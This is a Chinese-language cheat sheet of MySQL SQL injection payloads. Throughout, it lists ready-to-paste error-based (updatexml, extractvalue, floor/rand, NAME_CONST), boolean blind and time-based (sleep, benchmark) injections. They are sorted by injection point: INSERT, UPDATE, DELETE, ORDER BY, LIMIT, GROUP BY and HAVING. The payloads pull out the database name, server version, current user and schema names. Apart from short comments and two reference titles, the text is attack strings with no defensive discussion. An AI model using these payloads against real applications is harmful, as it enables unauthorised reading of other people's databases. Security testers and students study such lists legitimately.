Insert:
语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)
报错注入:
insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');
insert into test(id,name,pass) values (6,'xiaozi' or extractvalue(1,concat(0x7e,database())) or '', 'Nervo');
盲注:
//根据or之间的表达式是否成立来进行盲注
'or 1=1 or ' //插入的测试语句直接当成sql语句执行,并把存储返回值,表达式成立,返回结果为1
'or 1=2 or ' //表达式不成立,返回结果为0
' or exists(select * from information_schema.tables) or' //返回结果为1
aaa' or length(database())=11 or '//返回正确
aaa' or mid(database(),1,1)='t' or'//返回正确
aaa' or mid(database(),1,11)='test' or '//返回正确
insert into test(id,name,pass) values (2,'mis1',''or ascii(mid(database(),1,1))=116 or'')
时间盲注:
insert into test(id,name,pass) values (2,'mis1',''or if(mid(database(),1,1)='a',sleep(10),0) or'')
Update:
update test set pass='baidu' or updatexml(1,concat(0x7e,(version()),0x7e),0) or''WHERE id=2 and name='0';
update test set pass='baidu' or extractvalue(1,concat(0x7e,database())) or''WHERE id=2 and name='0';
Delete:
DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or'';
DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or'';
Order by:
order by [id]---【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
order by [id] desc/asc ---【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
Limit 0,1:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】
报错注入:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:
SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE 'w', BENCHMARK(5000000,SHA1(1)),5)))),1);
Group by:
group by username --【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
Having :
Having 1=1 --【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
Mysql报错注入:
1、通过floor报错
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
2、ExtractValue
and extractvalue(1, concat(0x5c,(select user())))
3、UpdateXml
and 1=(updatexml(1,concat(0x3a,(select user())),1))
4、利用NAME_CONST注入
and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
5、join报错注入
mysql> select * from(select * from users a join users b)c;
mysql> select * from(select * from users a join users b using(id))c;
mysql> select * from(select * from users a join users b using(id,name))c;
Mysql盲注:
#select * from test where id =2 and length(version())=6
#select * from test where id =2 and ascii(substring(version(),7,1))>1
#select * from test where id =2 and length(database())=4
#select * from test where id =2 and ascii(mid(database(),4,1))=116
#select * from test where id =2 and (select length(version()))=6
#select * from test where id =2 and (select count(*) from test)=3
Mysql时间盲注:
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)
#select * from test where id =2 and if(substring(user(),1,1)='r',sleep(5),0)
#select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)
参考资料:
1、 Mysql报错注入原理分析(count()、rand()、group by)
3、利用insert,update和delete注入获取数据
